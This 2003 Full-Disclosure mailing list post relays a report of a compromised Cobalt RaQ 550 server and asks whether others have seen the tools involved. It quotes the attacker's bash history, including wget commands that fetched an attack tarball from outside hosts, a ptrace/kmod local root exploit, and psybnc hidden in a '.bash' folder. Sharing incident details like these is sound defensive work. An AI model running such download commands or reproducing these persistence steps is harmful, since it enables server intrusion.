[Full-Disclosure] raq 550 compromised
adf at code511.com
Tue Oct 7 02:37:24 BST 2003
sorry for the "cross-post", I just saw this message on cobalt-security
mailing list today:
an user got his raq 550 compromised and he posted some bash history he
:unknown binaries (yet?) named "mumu"
:Linux kernel ptrace/kmod local root exploit from ipsec
: it will decompress psybnc in a hidden folder (.bash)
-wget snow.prohosting.com/muiemuie/km3.tgz ----->(file offline)
-wget 126.96.36.199/muiemuie/km3.tgz ----->(file offline)
anyone seen pizda or mumu ?
if you interested in all details of the post:
Full-Disclosure is hosted and sponsored by Secunia.